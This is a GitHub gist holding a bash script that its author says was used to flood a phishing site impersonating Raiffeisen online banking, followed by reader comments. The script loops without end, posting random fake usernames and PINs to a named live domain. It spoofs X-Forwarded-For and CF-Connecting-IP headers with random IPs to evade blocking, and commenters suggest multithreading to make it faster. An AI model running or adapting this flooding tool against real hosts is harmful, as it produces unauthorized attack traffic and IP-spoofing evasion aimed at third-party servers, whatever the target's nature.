Skip to content

Instantly share code, notes, and snippets.

@geek-at
Created August 13, 2020 07:27
Show Gist options
  • Save geek-at/53768c6b7aee7a973032cfb7daf65107 to your computer and use it in GitHub Desktop.
Save geek-at/53768c6b7aee7a973032cfb7daf65107 to your computer and use it in GitHub Desktop.
The script used to trash a banking phishing site
#!/bin/bash
while :; do
verf=$(cat /dev/urandom | tr -dc '0-9' | fold -w 8 | head -n 1)
pin=$(cat /dev/urandom | tr -dc '0-9' | fold -w 5 | head -n 1)
ip=$(printf "%d.%d.%d.%d\n" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))")
curl -s -I http://elba-app.com/Raiffeisen/ > header.txt
cookie=$(cat header.txt | grep 'Set-Cookie:' | cut -d ' ' -f 2 | cut -d ';' -f 1)
location=$(cat header.txt | grep 'location:' | cut -d ' ' -f 2 | cut -d '/' -f 1)
echo "$ip $cookie with $location"
echo "[i] Login"
curl -s "http://elba-app.com/Raiffeisen/$location/submit.php" \
-H 'Connection: keep-alive' \
-H 'Cache-Control: max-age=0' \
-H 'Upgrade-Insecure-Requests: 1' \
-H 'Origin: http://elba-app.com' \
-H "X-Forwarded-For: $ip" \
-H "CF-Connecting-IP: $ip" \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
-H "Referer: http://elba-app.com/Raiffeisen/$location/login.php?" \
-H 'Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7' \
-H "Cookie: $cookie" \
--data-raw "verbot=&type=username&state_text=Salzburg&state=ELOOE-05-V-&username=ELOOE-05-V-$verf" \
--compressed \
--insecure
echo "[i] Pass"
curl -s "http://elba-app.com/Raiffeisen/$location/pass.php?" \
-H 'Connection: keep-alive' \
-H "CF-Connecting-IP: $ip" \
-H 'Cache-Control: max-age=0' \
-H 'Upgrade-Insecure-Requests: 1' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36' \
-H "X-Forwarded-For: $ip" \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
-H "Referer: http://elba-app.com/Raiffeisen/$location/login.php?" \
-H 'Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7' \
-H "Cookie: $cookie" \
--compressed \
--insecure
echo "[i] hundle"
curl -s "http://elba-app.com/Raiffeisen/$location/hundle-pin.php" \
-H 'Connection: keep-alive' \
-H 'Accept: text/html, */*; q=0.01' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36' \
-H "Content-Type: multipart/related" \
-H "X-Forwarded-For: $ip" \
-H "CF-Connecting-IP: $ip" \
-H 'Origin: http://elba-app.com' \
-H "Referer: http://elba-app.com/Raiffeisen/$location/pass.php?" \
-H 'Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7' \
-H "Cookie: $cookie" \
--form "pin=$pin" \
--compressed \
--insecure
echo "Sent $verf with pin $pin"
done
@RyanNerd
Copy link

You are a tech god among men. I just finished reading your blog at https://blog.haschek.at/2020/stopping-phishing-campaigns-with-bash.html and what a fun ride. Thanks!

@geek-at
Copy link
Author

geek-at commented Aug 14, 2020

Glad you liked it

@dariusll
Copy link

dariusll commented Aug 14, 2020

Read your blog post. I also had similar case. After I saw that my script was kind of slow, I implemented multithread. It became MUCH faster. Right now scripts sends request only after you get 200 response. Multithread or asynchronous for the win

@geek-at
Copy link
Author

geek-at commented Aug 14, 2020

Read your blog post. I also had similar case. After I saw that my script was kind of slow, I implemented multithread. It became MUCH faster. Right now scripts sends request only after you get 200 response. Multithread or asynchronous for the win

Awesome, can you share it?

@lunandd
Copy link

lunandd commented Aug 15, 2020

You are a legend

@juliend2
Copy link

image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment